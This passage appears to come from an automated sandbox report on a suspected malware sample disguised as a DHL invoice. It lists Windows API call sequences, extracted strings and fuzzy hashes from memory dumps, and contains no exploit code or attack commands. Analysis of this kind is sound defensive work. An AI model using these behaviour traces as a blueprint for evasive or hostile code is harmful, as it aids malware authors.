                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 003918A5
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 003918AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 146765662-0
                                                                                                                        • Opcode ID: 0922549d908556d086e41ceee048fe877e8cce9c1cdda9796075a0cbd9730f2a
                                                                                                                        • Instruction ID: 17fb4ca6e805e2ac1d0cd051674226edfa2a07651f3670239db25e32117c85bf
                                                                                                                        • Opcode Fuzzy Hash: 0922549d908556d086e41ceee048fe877e8cce9c1cdda9796075a0cbd9730f2a
                                                                                                                        • Instruction Fuzzy Hash: D5E0C236414501BBDB025BA2ED0CD0ABB2DFB49B22B109220F229C1470CB32A420DB50
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0033BEB3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer
                                                                                                                        • String ID: D%@$D%@$D%@$D%@D%@
                                                                                                                        • API String ID: 1385522511-1921936383
                                                                                                                        • Opcode ID: c7dc66ac17504900feead5880d997ebd216b111b2e652e32b198f9a5f7f8413f
                                                                                                                        • Instruction ID: bb118b0d89e2df1c9824a903c518a52dd3e23ea8869386db254085b30d89e7b3
                                                                                                                        • Opcode Fuzzy Hash: c7dc66ac17504900feead5880d997ebd216b111b2e652e32b198f9a5f7f8413f
                                                                                                                        • Instruction Fuzzy Hash: 11915975A0020ADFCB29CF58C4D06AAF7F5FF58314F25816ADA45AB350D771AA81CB90
APIs
  • Part of subcall function 00350242: EnterCriticalSection.KERNEL32(0040070C,00401884,?,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035024D
  • Part of subcall function 00350242: LeaveCriticalSection.KERNEL32(0040070C,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035028A
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
  • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
• __Init_thread_footer.LIBCMT ref: 003B7BFB
  • Part of subcall function 003501F8: EnterCriticalSection.KERNEL32(0040070C,?,?,00348747,00402514), ref: 00350202
  • Part of subcall function 003501F8: LeaveCriticalSection.KERNEL32(0040070C,?,00348747,00402514), ref: 00350235
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
• String ID: +T8$5$G$Variable must be of type 'Object'.
• API String ID: 535116098-1932661733
• Opcode ID: 6ccb159725d1aff5f959ad17c2ec580684db8785befece4eb109539b43d3eca4
• Instruction ID: 8e37fc7e0bd031957180e0d6a515cccca447c56945e448e6fbb56f30c2e63b85
• Opcode Fuzzy Hash: 6ccb159725d1aff5f959ad17c2ec580684db8785befece4eb109539b43d3eca4
• Instruction Fuzzy Hash: FE919B74A04208AFCB16EF54C891DEDBBB5EF85348F10805DF906AF692DB71AE41CB50
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 003BAEA3
  • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
• GetProcessId.KERNEL32(00000000), ref: 003BAF38
• CloseHandle.KERNEL32(00000000), ref: 003BAF67
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CloseExecuteHandleProcessShell_wcslen
• String ID: <$@
• API String ID: 146682121-1426351568
• Opcode ID: 8309eef7004ac458beea377ef64abd1744776ce0cbf8772cb5a6ad4d9debad32
• Instruction ID: e3abea7474b37f7092d13c6a801548e2f7d3db620e35da19ac93007b685e908c
• Opcode Fuzzy Hash: 8309eef7004ac458beea377ef64abd1744776ce0cbf8772cb5a6ad4d9debad32
• Instruction Fuzzy Hash: 0D717775A00A18DFCB16DF54C484A9EBBF0BF08314F058499E856AF7A2CB74ED41CB91
APIs
• GetWindowRect.USER32(00E8E8F0,?), ref: 003C62E2
• ScreenToClient.USER32(?,?), ref: 003C6315
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 003C6382
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID: xV
• API String ID: 3880355969-2513823414
• Opcode ID: a6c4caa13c92188a6ac2ad0df4a0ee7f031a9f50a77a94f12447b201b0524d0a
• Instruction ID: 4f229f8bb5c3152e83d1f8d0a09c0df0e7c9880e91dd02abd3c4c9fe36d8b9bf
• Opcode Fuzzy Hash: a6c4caa13c92188a6ac2ad0df4a0ee7f031a9f50a77a94f12447b201b0524d0a
• Instruction Fuzzy Hash: EA512874A00249AFCB12DF68D981EAE7BB5EB85360F11816DF815DB2A1D730ED81CB50
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00397206
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0039723C
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0039724D
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003972CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: 2c27b52494a5ed717e6b523666422b7824c136e56eda254bbad4d92d756a7fde
• Instruction ID: aef1fbe1eb146554f81be2a67f22ce51ac65557b8bff15777f6c4f31df5ed0a4
• Opcode Fuzzy Hash: 2c27b52494a5ed717e6b523666422b7824c136e56eda254bbad4d92d756a7fde
• Instruction Fuzzy Hash: 31418E72624204EFDF16CF54C884A9A7BA9EF44710F2584A9FD09DF28AD7B1DD40CBA0
APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0039C306
• DeleteMenu.USER32(?,00000007,00000000), ref: 0039C34C
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00401990,(V), ref: 0039C395
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: (V$0
• API String ID: 135850232-1321988580
• Opcode ID: b7d854bce3bead105c4f2876946c0bf6eeff0ed16475dd4e220befff1665423e
• Instruction ID: b4012bb34a01f058eeb0d8979df098bbfc3d38313656e41eb7db57a7f4f4cdd0
• Opcode Fuzzy Hash: b7d854bce3bead105c4f2876946c0bf6eeff0ed16475dd4e220befff1665423e
• Instruction Fuzzy Hash: 8041B0752143019FDB22DF29D884F5ABBE8AF85320F019A1DF8A59B2D1D774E904CB52
APIs
• SendMessageW.USER32(?,00001024,00000000,?), ref: 003C5352
• GetWindowLongW.USER32(?,000000F0), ref: 003C5375
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C5382
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C53A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: LongWindow$InvalidateMessageRectSend
• String ID: xV
• API String ID: 3340791633-2513823414
• Opcode ID: 1380f4b4a5e77297b758dc1273bbfa58cf2a940b40f424be2b8ce9778ad232e3
• Instruction ID: 74c20a7524c8d86ffe04e95534d223d750b770a8b269ad625a114295bc856d78
• Opcode Fuzzy Hash: 1380f4b4a5e77297b758dc1273bbfa58cf2a940b40f424be2b8ce9778ad232e3
• Instruction Fuzzy Hash: 7931B038B55A88AFEB339E14CC45FE87769AB04390F59410AFA11D62E1C7B0BDC09B41
APIs
• ClientToScreen.USER32(?,?), ref: 003C769A
• GetWindowRect.USER32(?,?), ref: 003C7710
• PtInRect.USER32(?,?,003C8B89), ref: 003C7720
• MessageBeep.USER32(00000000), ref: 003C778C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID: xV
• API String ID: 1352109105-2513823414
• Opcode ID: 1ebf09134b8824c71b61af82156d8b4c9a27177ecb459c872a80b97b1b0bf641
• Instruction ID: 8853ca371687360ea9dc42a61dea68c52461c0ef7ca459e99e6d3437f1286628
• Opcode Fuzzy Hash: 1ebf09134b8824c71b61af82156d8b4c9a27177ecb459c872a80b97b1b0bf641
• Instruction Fuzzy Hash: A2417875A092189FCB12DF68C994FA9B7F5BB49354F1A80ACE814EB261C730ED41CF90
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003C4705
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003C4713
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003C471A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32$xV
• API String ID: 4014797782-1842320223
• Opcode ID: 4950e1c918ff542e62966665ed615328c31da3d3713dd059de3cc1d48875d5fc
• Instruction ID: cfc68169a0acc532e8b678aa393162e86cd34f2a90ae0598d3fb2a8b6029c534
• Opcode Fuzzy Hash: 4950e1c918ff542e62966665ed615328c31da3d3713dd059de3cc1d48875d5fc
• Instruction Fuzzy Hash: E0213CB5600209AFDB12DF64DCD1EA737ADEB5A3A4B050059FA14DB361CB71EC61CB60
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003C2F8D
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 003C2F94
                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003C2FA9
                                                                                                                        • DestroyWindow.USER32(?), ref: 003C2FB1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                        • String ID: SysAnimate32
                                                                                                                        • API String ID: 3529120543-1011021900
                                                                                                                        • Opcode ID: e74fb0f2eea6cd0bd91886870837b1d529cbe2079a6027dc37d0822608d5402e
                                                                                                                        • Instruction ID: 79338a4c1d4d0a03ca501d166e3cafc585f22e994e2b3670428ced915eb555c7
                                                                                                                        • Opcode Fuzzy Hash: e74fb0f2eea6cd0bd91886870837b1d529cbe2079a6027dc37d0822608d5402e
                                                                                                                        • Instruction Fuzzy Hash: 1E21AC72204209ABEB228F64DC80FBB77BDEB59364F12562CFA50D61A0DB71EC519760
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C9001
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00387711,?,?,?,?,?), ref: 003C9016
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C905E
                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00387711,?,?,?), ref: 003C9094
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 2864067406-2513823414
                                                                                                                        • Opcode ID: 7d0cd54aade6ab70e29e88b7663b265cc0d3c2dc00d5de8daee5f15982484d8a
                                                                                                                        • Instruction ID: e47351993fde7330da3ce92135e4dbd8e26b6a6fc3ae653566620ce078e35e70
                                                                                                                        • Opcode Fuzzy Hash: 7d0cd54aade6ab70e29e88b7663b265cc0d3c2dc00d5de8daee5f15982484d8a
                                                                                                                        • Instruction Fuzzy Hash: 1A218336600028EFDB168F95CC58FFA7BB9EF49350F1540AAF5059B261C731AD50DB60
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00354D1E,003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002), ref: 00354D8D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00354DA0
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00354D1E,003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000), ref: 00354DC3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 18badcfbdbb59c4b08fb18e3ea1d0ed0597a0c58453d05eba831195b68eeda5a
                                                                                                                        • Instruction ID: a0c4dd18dcbdfefaca2e9603b6fbe6e90d87aa5378a33bdc364f7aeb5aa1416c
                                                                                                                        • Opcode Fuzzy Hash: 18badcfbdbb59c4b08fb18e3ea1d0ed0597a0c58453d05eba831195b68eeda5a
                                                                                                                        • Instruction Fuzzy Hash: 98F08C35A50208ABDB169B90DC49FEEBBF8EF04712F0400A4EC09A6260CB30A984CB90
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0038D3AD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038D3BF
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0038D3E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                        • API String ID: 145871493-2590602151
                                                                                                                        • Opcode ID: d6acae019a3340cd75dd6769bd02aab0e1291a39984b301b319b2415d4d2f961
                                                                                                                        • Instruction ID: 1e14141e35c353131c87f7ee00333b0ffb3ef425a40f1e48751b672d4583e496
                                                                                                                        • Opcode Fuzzy Hash: d6acae019a3340cd75dd6769bd02aab0e1291a39984b301b319b2415d4d2f961
                                                                                                                        • Instruction Fuzzy Hash: 01F05538845B20ABD73337108C08E69B31CAF00701F5A95D9F80BE20C4CB70DD408782
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E9C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00334EAE
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EC0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                        • Opcode ID: 9530a494dd06db302388d4db297f4f2c9dfa072993239416aefb4e1241afeb3b
                                                                                                                        • Instruction ID: f1e1ab08cea6cf18bc1318c59ea0a06f77c1559a543eb241ccc7b4da194c8678
                                                                                                                        • Opcode Fuzzy Hash: 9530a494dd06db302388d4db297f4f2c9dfa072993239416aefb4e1241afeb3b
                                                                                                                        • Instruction Fuzzy Hash: 8DE0CD35E125225BD23317266C18F6FA55CAFC1F62F0A0115FD09D2210DB60ED0242A0
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E62
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00334E74
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E87
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                        • Opcode ID: a80fbf3c80e5c8c445e28e10fd4edfd8fc83d4298ee56ce2030e8d42db0f48a6
                                                                                                                        • Instruction ID: bdcf479038da21fac66f2d4b2ac29d7d3b3e368edfec3395e219c6b12f0ad368
                                                                                                                        • Opcode Fuzzy Hash: a80fbf3c80e5c8c445e28e10fd4edfd8fc83d4298ee56ce2030e8d42db0f48a6
                                                                                                                        • Instruction Fuzzy Hash: 87D05B369126315756331B66BC1CEDF6A1CAF85F52B0A1515F90DE2114CF60ED02C7D0
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 003BA427
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003BA435
                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003BA468
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 003BA63D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
